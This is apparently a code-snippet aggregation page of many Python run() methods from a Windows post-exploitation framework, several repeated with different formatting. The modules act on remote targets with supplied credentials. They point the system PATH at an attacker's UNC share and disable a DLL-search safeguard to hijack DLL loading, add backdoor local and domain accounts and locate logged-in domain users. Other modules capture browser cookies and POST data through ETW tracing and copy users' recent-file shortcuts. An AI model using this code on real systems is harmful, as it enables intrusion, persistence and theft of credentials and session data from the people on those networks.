Exemple #1
0
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]

        for target in self.targets:

            existingPath, newPath = "", ""

            # reg.exe to get the current path
            pathCMD = "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path"
            pathResult = command_methods.executeResult(target, username,
                                                       password, pathCMD,
                                                       triggerMethod)

            # parse the PATH output
            parts = pathResult.split("\r\n")
            # check if we get a valid result
            if parts[1].startswith("HKEY"):
                regParts = parts[2].split()
                existingPath = " ".join(regParts[2:])

            if existingPath != "":
                newPath = "\\\\" + lhost + "\\system\\;" + existingPath
            else:
                print helpers.color(" [!] Error: No path found\n",
                                    warning=True)

            regCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \"" + newPath + "\""

            regResult = command_methods.executeResult(target, username,
                                                      password, regCMD,
                                                      triggerMethod)

            if regResult == "":
                self.output += "[!] No result file, reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully." in regResult:
                self.output += "[*] reg PATH successfully set with \\\\" + lhost + "\\system using creds '" + username + ":" + password + "' on : " + target + "\n"

                # add in our cleanup command to restore the original PATH
                cleanupCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \"" + existingPath + "\""
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

                # allow \\UNC loading in %PATH% :)
                regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0"
                regResult2 = command_methods.executeResult(
                    target, username, password, regCMD2, triggerMethod)
                self.output += "[*] reg command to allow UNC loading successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
                # cleanup -> make everything more secure by disable UNC/SMB loading
                cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD2 + "|" + triggerMethod + "\n"
            else:
                self.output += "[!] reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"

        # print a message if command succeeded on at least one box
        if self.output != "":
            self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        group = self.required_options["group"][0]

        triggerMethod = "winexe"

        for target in self.targets:

            targetUsernames = []

            # reg.exe command to query the domain group
            # we want to do this on each box so we can operate across domains!
            command = "net group \"%s\" /domain" % (group)
            result = command_methods.executeResult(target, username, password,
                                                   command, triggerMethod)

            # TODO: sanity check that we get a correct file back?

            # find the ---------- marker, get the bottom half, split by newline
            # and extract just the name fields
            nameParts = result[result.find("-----"):].split("\r\n")[1:-3]
            for part in nameParts:
                targetUsernames.extend(part.lower().split())

            # check the task list on the host
            taskListResult = command_methods.executeResult(
                target, username, password, "tasklist /V /FO CSV",
                triggerMethod)

            # check the sessions list on the host
            sessionsResult = command_methods.executeResult(
                target, username, password, "qwinsta", triggerMethod)

            print ""

            # for each username in our target list, see if they show up in the queried results
            for u in targetUsernames:
                if u.lower() in taskListResult.lower():
                    self.output += "[*] User '%s\\%s' has a process on %s\n" % (
                        group, u, target)
                    print helpers.color(
                        "\n [*] User '%s\\%s' has a process on %s!" %
                        (group, u, target))
                    time.sleep(1)
                if u.lower() in sessionsResult.lower():
                    self.output += "[*] User '%s\\%s' has a session on %s\n" % (
                        group, u, target)
                    print helpers.color(
                        " [*] User '%s\\%s' has a session on %s!" %
                        (group, u, target))
                    time.sleep(1)

        # if we have no results, add message to the output
        if self.output == "":
            self.output = "[!] No users found\n"
Exemple #3
0
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]

        for target in self.targets:

            existingPath, newPath = "", ""

            # reg.exe to get the current path
            pathCMD = "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path"
            pathResult = command_methods.executeResult(target, username, password, pathCMD, triggerMethod)

            # parse the PATH output
            parts = pathResult.split("\r\n")
            # check if we get a valid result
            if parts[1].startswith("HKEY"):
                regParts = parts[2].split()
                existingPath = " ".join(regParts[2:])

            if existingPath != "":
                newPath = "\\\\"+lhost+"\\system\\;"+existingPath
            else:
                print helpers.color(" [!] Error: No path found\n", warning=True)

            regCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \""+newPath+"\""

            regResult = command_methods.executeResult(target, username, password, regCMD, triggerMethod)

            if regResult == "":
                self.output += "[!] No result file, reg PATH set failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The operation completed successfully." in regResult:
                self.output += "[*] reg PATH successfully set with \\\\"+lhost+"\\system using creds '"+username+":"+password+"' on : " + target + "\n"

                # add in our cleanup command to restore the original PATH
                cleanupCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \""+existingPath+"\""
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
            
                # allow \\UNC loading in %PATH% :)
                regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0"
                regResult2 = command_methods.executeResult(target, username, password, regCMD2, triggerMethod)
                self.output += "[*] reg command to allow UNC loading successfully set using creds '"+username+":"+password+"' on : " + target + "\n"
                # cleanup -> make everything more secure by disable UNC/SMB loading
                cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD2+"|"+triggerMethod+"\n"
            else:
                self.output += "[!] reg PATH set failed using creds '"+username+":"+password+"' on : " + target + "\n"

        # print a message if command succeeded on at least one box
        if self.output != "":
            self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"
Exemple #4
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            userToAdd = self.required_options["user"][0]
            passToAdd = self.required_options["pass"][0]
            groupToAdd = self.required_options["group"][0]

            # command to add the user:password to the machine
            userAddCommand = "net user " + userToAdd + " " + passToAdd + " /add"

            # command to add the user to the specified localgroup
            groupAddCommand = "net localgroup " + groupToAdd + " " + userToAdd + " /add"

            # execute the user add command and get the result
            userAddResult = command_methods.executeResult(
                target, username, password, userAddCommand, triggerMethod)

            # check all of our results as appropriate
            if userAddResult == "":
                self.output += "[!] No result file, user add '" + userToAdd + ":" + passToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"

            elif "The command completed successfully" in userAddResult:
                self.output += "[*] User '" + userToAdd + ":" + passToAdd + "' successfully added using creds '" + username + ":" + password + "' on " + target + "\n"

                # cleanup -> delete the user from the system
                cleanupCMD = "net user " + userToAdd + " /delete"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

                # if the user add command succeeded, continue to the group add
                groupAddResult = command_methods.executeResult(
                    target, username, password, groupAddCommand, triggerMethod)

                if groupAddResult == "":
                    self.output += "[!] No result file, user add of user '" + userToAdd + "' to localgroup '" + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"

                elif "The command completed successfully" in groupAddResult:
                    self.output += "[*] User '" + userToAdd + "' successfully added to localgroup '" + groupToAdd + "' using creds '" + username + ":" + password + "' on " + target + "\n"

                else:
                    self.output += "[!] User add '" + userToAdd + "' to localgroup '" + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"

            else:
                self.output += "[!] User add '" + userToAdd + ":" + passToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
Exemple #5
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        group = self.required_options["group"][0]

        triggerMethod = "winexe"

        for target in self.targets:
            
            targetUsernames = []

            # reg.exe command to query the domain group
            # we want to do this on each box so we can operate across domains!
            command = "net group \"%s\" /domain" %( group )
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            # TODO: sanity check that we get a correct file back?

            # find the ---------- marker, get the bottom half, split by newline
            # and extract just the name fields
            nameParts = result[result.find("-----"):].split("\r\n")[1:-3]
            for part in nameParts:
                targetUsernames.extend(part.lower().split())

            # check the task list on the host
            taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod)
            
            # check the sessions list on the host
            sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod)

            print ""

            # for each username in our target list, see if they show up in the queried results
            for u in targetUsernames:
                if u.lower() in taskListResult.lower():
                    self.output += "[*] User '%s\\%s' has a process on %s\n" %(group, u, target)
                    print helpers.color("\n [*] User '%s\\%s' has a process on %s!" %(group, u, target))
                    time.sleep(1)
                if u.lower() in sessionsResult.lower():
                    self.output += "[*] User '%s\\%s' has a session on %s\n" %(group, u, target)
                    print helpers.color(" [*] User '%s\\%s' has a session on %s!" %(group, u, target))
                    time.sleep(1)

        # if we have no results, add message to the output
        if self.output == "":
            self.output = "[!] No users found\n"
Exemple #6
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        trigger_method = "wmis"

        for target in self.targets:

            # reg.exe command to query the domain group
            command = "whoami /user"
            result = command_methods.executeResult(target, username, password,
                                                   command, trigger_method)

            if result == "":
                self.output += "[!] No result file, query for domain sid '" + group + "'' failed on " + target + "\n"
            else:
                sid = ""
                for line in result.split("\n"):
                    if "S-" in line:
                        user, sid_full = line.split()
                        # extract the domain sid from the results
                        sid = "-".join(sid_full.split("-")[:-1])
                        print helpers.color("\n\n [*] Domain sid: " + sid)
                        time.sleep(2)
                        self.output += "[*] Domain sid extracted using creds '" + username + ":" + password + "' on " + target + ": " + sid + "\n"
                if sid == "":
                    self.output += "[!] Couldn't extract domain sid from results using creds '" + username + ":" + password + "' on " + target + "\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # reg.exe command to detect if powershell is installed
            command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
            result = command_methods.executeResult(target, username, password,
                                                   command, triggerMethod)

            if result.startswith("error:"):
                self.output += "[!] Error '" + result + "' in detecting powershell using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif result == "":
                self.output += "[!] No result file, detect PowerShell failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "0x1" in result:
                self.output += "[*] PowerShell detected using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "0x0" in result:
                self.output += "[*] PowerShell not detected using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                print "result:", result
                self.output += "[!] Error in detecting PowerShell using creds '" + username + ":" + password + "' on : " + target + "\n"
Exemple #8
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # command to invoke finddllhijack and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe"
        cmd = "C:\\Windows\\Temp\\finddllhijack.exe"

        for target in self.targets:
 
            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
            
            # execute finddllhijack and get the results
            out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)
        
            # cleanup 
            command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

            if out != "":
                self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n"
            else:
                self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        trigger_method = "wmis"

        for target in self.targets:
            
            # reg.exe command to query the domain group
            command = "whoami /user"
            result = command_methods.executeResult(target, username, password, command, trigger_method)

            if result == "":
                self.output += "[!] No result file, query for domain sid '"+group+"'' failed on " + target + "\n"
            else:
                sid = ""
                for line in result.split("\n"):
                    if "S-" in line:
                        user,sid_full = line.split()
                        # extract the domain sid from the results
                        sid = "-".join(sid_full.split("-")[:-1])
                        print helpers.color("\n\n [*] Domain sid: "+sid)
                        time.sleep(2)
                        self.output += "[*] Domain sid extracted using creds '"+username+":"+password+"' on " + target + ": "+sid+"\n"
                if sid == "":
                    self.output += "[!] Couldn't extract domain sid from results using creds '"+username+":"+password+"' on " + target + "\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            userToAdd = self.required_options["user"][0]
            passToAdd = self.required_options["pass"][0]
            groupToAdd = self.required_options["group"][0]

            # command to add the user:password to the machine
            userAddCommand = "net user "+userToAdd+" "+passToAdd+" /add /domain"

            # command to add the user to the specified domain group
            groupAddCommand = "net group "+groupToAdd+" "+userToAdd+" /add /domain"

            # execute the user add command and get the result
            userAddResult = command_methods.executeResult(target, username, password, userAddCommand, triggerMethod)

            # check all of our results as appropriate
            if userAddResult == "":
                self.output += "[!] No result file, domain user add '"+userToAdd+":"+passToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
            
            elif "The command completed successfully" in userAddResult:
                self.output += "[*] Domain user '"+userToAdd+":"+passToAdd+"' successfully added using creds '"+username+":"+password+"' on " + target + "\n"

                # cleanup -> delete the user from the domain
                cleanupCMD = "net user "+userToAdd+" /delete /domain"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"

                # if the user add command succeeded, continue to the group add
                groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod)

                if groupAddResult == "":
                    self.output += "[!] No result file, domain user add of user '"+userToAdd+"' to group '"+groupToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
                
                elif "The command completed successfully" in groupAddResult:
                    self.output += "[*] Domain user '"+userToAdd+"' successfully added to group '"+groupToAdd+"' using creds '"+username+":"+password+"' on " + target + "\n"
               
                else:
                    self.output += "[!] Domain user add '"+userToAdd+"' to group '"+groupToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"

            else:
                self.output += "[!] Domain user add '"+userToAdd+":"+passToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
Exemple #11
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        targetUsernames = []

        # if we're passed a file, read in the usernames
        if os.path.exists(self.required_options["user"][0]):
            f = open(self.required_options["user"][0])
            lines = f.readlines()
            f.close()

            for line in lines:
                targetUsernames.append(line.strip())

        # if we have just a single name, use just that
        else:
            targetUsernames.append(self.required_options["user"][0])

        for target in self.targets:

            # check the task list on the host
            taskListResult = command_methods.executeResult(
                target, username, password, "tasklist /V /FO CSV",
                triggerMethod)

            # check the sessions list on the host
            sessionsResult = command_methods.executeResult(
                target, username, password, "qwinsta", triggerMethod)

            # for each username in our target list, see if they show up in the queried results
            for u in targetUsernames:
                if u.lower() in taskListResult.lower():
                    self.output += "[*] User '%s' has process on %s\n" % (
                        u, target)
                if u.lower() in sessionsResult.lower():
                    self.output += "[*] User '%s' has session on %s\n" % (
                        u, target)

        # if we have no results, add message to the output
        if self.output == "":
            self.output = "[!] No users found\n"
Exemple #12
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        targetUsernames = []

        # if we're passed a file, read in the usernames
        if os.path.exists(self.required_options["user"][0]):
            f = open(self.required_options["user"][0])
            lines = f.readlines()
            f.close()

            for line in lines:
                targetUsernames.append(line.strip())

        # if we have just a single name, use just that
        else:
            targetUsernames.append(self.required_options["user"][0])

        for target in self.targets:
            
            # check the task list on the host
            taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod)
            
            # check the sessions list on the host
            sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod)

            # for each username in our target list, see if they show up in the queried results
            for u in targetUsernames:
                if u.lower() in taskListResult.lower():
                    self.output += "[*] User '%s' has process on %s\n" %(u, target)
                if u.lower() in sessionsResult.lower():
                    self.output += "[*] User '%s' has session on %s\n" %(u, target)

        # if we have no results, add message to the output
        if self.output == "":
            self.output = "[!] No users found\n"
Exemple #13
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        command = self.required_options["command"][0]

        for target in self.targets:
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result != "":
                self.output += "[*] Results for '"+command+"' using creds '"+username+":"+password+"' on "+target+" : \n"
                self.output += result
                self.output += "\n\n"
Exemple #14
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        flag = self.required_options["flag"][0]

        for target in self.targets:

            # stop the ETW
            stopCMD = "logman stop Status32 -ets"
            command_methods.executeCommand(target, username, password, stopCMD,
                                           triggerMethod)

            # search for cookies or POST paramters
            if flag.lower() == "post":
                flag = "POST"
                moduleFile = "post_params.txt"
            else:
                flag = "cookie added"
                moduleFile = "cookies.txt"

            # check the ETW results for the specified flag, and delete the dump file
            parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\""

            # wait 20 seconds for everything to parse...if errors happen, increase this
            parseResult = command_methods.executeResult(target,
                                                        username,
                                                        password,
                                                        parseCmd,
                                                        triggerMethod,
                                                        pause=20)

            # delete the trace file
            delCmd = "del C:\\Windows\\Temp\\status32.etl"
            command_methods.executeCommand(target, username, password, delCmd,
                                           triggerMethod)

            if parseResult == "":
                self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, moduleFile,
                                                  parseResult)
                self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
Exemple #15
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = "winexe"

        for target in self.targets:
            
            # net command to query the domain group
            command = "net users /domain"
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, query for domain user failed using creds '"+username+":"+password+"' on " + target + "\n"
            else:
                self.output += "[!] Query for domain users sucessful on " + target + ":\n"
                self.output += result + "\n"
Exemple #16
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = "winexe"

        for target in self.targets:

            # net command to query the domain group
            command = "net users /domain"
            result = command_methods.executeResult(target, username, password,
                                                   command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, query for domain user failed using creds '" + username + ":" + password + "' on " + target + "\n"
            else:
                self.output += "[!] Query for domain users sucessful on " + target + ":\n"
                self.output += result + "\n"
Exemple #17
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # kill all powershell processes
        killCMD = "taskkill /f /im powershell.exe"

        for target in self.targets:

            # execute the command on the host and get the output
            out = command_methods.executeResult(target, username, password, killCMD, triggerMethod=triggerMethod)

            if "SUCCESS" in out:
                self.output += "[*] Powershell processes terminated using creds '"+username+":"+password+"' on "+target+"\n"
            else:
                self.output += "[*] Powershell processes failed to terminate using creds '"+username+":"+password+"' on "+target+"\n"
Exemple #18
0
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # disable RDP command
            rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"

            # execute the RDP enable command and get the result
            rdpResult = command_methods.executeResult(target, username, password, rdpCMD,triggerMethod)

            if rdpResult == "":
                self.output += "[!] No result file, RDP disable failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The operation completed successfully" in rdpResult:
                self.output += "[*] RDP successfully disabled using creds '"+username+":"+password+"' on : " + target + "\n"
Exemple #19
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:
            
            # reg.exe command to enable UAC
            command = "reg ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f"
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, UAC enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The operation completed successfully" in result:
                self.output += "[*] UAC successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"
            else:
                self.output += "[!] Error in enabling UAC using creds '"+username+":"+password+"' on : " + target + "\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:
            
            # reg_command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
            # but we don't actually care usually if it's installed, just if it's functionality
            # so let's just invoke it yo'
            command = "powershell.exe -c \"$a=42;$a\""
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result.strip() == "42":
                self.output += "[*] Powershell detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
            else:
                self.output += "[!] Powershell not detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # the registry command to disable the sethc stickkeys backdoor
            disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"

            # execute the sethc command and get the result
            disableResult = command_methods.executeResult(target, username, password, disableSethcCommand, triggerMethod)

            if disableResult == "":
                self.output += "[!] No result file, SETHC backdoor disable failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The operation completed successfully" in disableResult:
                self.output += "[*] SETHC backdoor successfully disabled using creds '"+username+":"+password+"' on : " + target + "\n"
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]
        trigger_method = self.required_options["trigger_method"][0]

        for target in self.targets:

            command = "echo %USERPROFILE%"
            user_profile = command_methods.executeResult(target, username, password, command, trigger_method)
            if user_profile == '':
                self.output += " [!] No result file querying env variables using creds " + username + ":" + password + " on: " + target + "\n"
            else:
                user_profile = user_profile.strip(" \r\n")

                recent_path1 = user_profile + "\\Recent"
                recent_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent"

                office_path1 = user_profile + "\\Application Data\\Microsoft\\Office\\Recent"
                office_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent"

                self.output += " [*] Enumerating recent files on %s \n" % target

                for path in [recent_path1, recent_path2, office_path1, office_path2]:
                    files = smb.ls(target, username, password, path, path_error=False)
                    if len(files) > 0:
                        self.output += " [*] Found %s files \n" % len(files)
                        for file in files:
                            if file[-3:] == "lnk":
                                out = smb.getFile(target, username, password, path + "\\" + file, delete=False)
                                if out == '':
                                    self.output += " [!] Failed retrieving : %s \n" % file
                                else:
                                    save_path = helpers.saveModuleFile(self, target, file, out)
                                    self.output += " [*] .lnk file %s saved from %s to %s\n" % (file,path,save_path)
                                    try:
                                        # parsed_lnk = str(pylnk.parse(save_path)).decode('cp1252')
                                        parsed_lnk = pylnker.parse_lnk(save_path)
                                        details_path = helpers.saveModuleFile(self, target, file + '_details', parsed_lnk)
                                        self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path,details_path)
                                    except:
                                        self.output += " [!] Error while parsing : %s \n" % save_path
Exemple #23
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        group = self.required_options["group"][0]
        
        triggerMethod = "winexe"

        for target in self.targets:
            
            # net command to query the domain group
            command = "net group \"%s\" /domain" %( group )
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, query for domain group '"+group+"'' failed using creds '"+username+":"+password+"' on " + target + "\n"
            else:
                self.output += "[*] Query for domain group '"+group+"'' sucessful using creds '"+username+":"+password+"' on " + target + ":\n"
                self.output += result + "\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # reg_command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
            # but we don't actually care usually if it's installed, just if it's functionality
            # so let's just invoke it yo'
            command = "powershell.exe -c \"$a=42;$a\""
            result = command_methods.executeResult(target, username, password,
                                                   command, triggerMethod)

            if result.strip() == "42":
                self.output += "[*] Powershell detected as functional using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                self.output += "[!] Powershell not detected as functional using creds '" + username + ":" + password + "' on : " + target + "\n"
Exemple #25
0
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # the registry command to disable the sethc stickkeys backdoor
            disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"

            # execute the sethc command and get the result
            disableResult = command_methods.executeResult(
                target, username, password, disableSethcCommand, triggerMethod)

            if disableResult == "":
                self.output += "[!] No result file, SETHC backdoor disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully" in disableResult:
                self.output += "[*] SETHC backdoor successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
Exemple #26
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:
 
            # command to start Event Tracing for Windows on the target for WinInit (IE)
            cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets"

            etwResult = command_methods.executeResult(target, username, password, cmd, triggerMethod)

            if etwResult == "":
                self.output += "[!] ETW unsuccessfully started using creds '"+username+":"+password+"' on  : " + target + ", no result file\n"
            elif "The command completed successfully." in etwResult:
                self.output += "[*] ETW started using creds '"+username+":"+password+"' on  "+target+"\n"
            else:
                self.output += "[!] ETW unsuccessfully started using creds '"+username+":"+password+"' on  : " + target + "\n"
Exemple #27
0
    def run(self):

        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # disable RDP command
            rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"

            # execute the RDP enable command and get the result
            rdpResult = command_methods.executeResult(target, username,
                                                      password, rdpCMD,
                                                      triggerMethod)

            if rdpResult == "":
                self.output += "[!] No result file, RDP disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully" in rdpResult:
                self.output += "[*] RDP successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
Exemple #28
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        for target in self.targets:

            print " [*] Doing something on %s" %(target)
            command = "something to do on the host"

            # ...
            result = command_methods.executeResult(target, username, password, command, self.required_options["trigger_method"][0])

            # check our output and write output/cleanup as appropriate
            if "something" in result:
                self.output += "action successful on " + target + "\n"
                # this needs to be tab-separated, check a module for examples
                self.cleanup += "cleanup command " + target + "\n"

        # finally return our putput and cleanup text
        return (self.output, self.cleanup)
Exemple #29
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        group = self.required_options["group"][0]

        triggerMethod = "winexe"

        for target in self.targets:

            # net command to query the domain group
            command = "net group \"%s\" /domain" % (group)
            result = command_methods.executeResult(target, username, password,
                                                   command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, query for domain group '" + group + "'' failed using creds '" + username + ":" + password + "' on " + target + "\n"
            else:
                self.output += "[*] Query for domain group '" + group + "'' sucessful using creds '" + username + ":" + password + "' on " + target + ":\n"
                self.output += result + "\n"
Exemple #30
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:
            
            # reg.exe command to disable UAC
            command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA"
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, check UAC failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "0x1" in result:
                self.output += "[*] UAC enabled using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "0x0" in result:
                self.output += "[*] UAC disabled using creds '"+username+":"+password+"' on : " + target + "\n"
            else:
                self.output += "[!] Error in checking UAC using creds '"+username+":"+password+"' on : " + target + "\n"
Exemple #31
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # reg.exe command to disable UAC
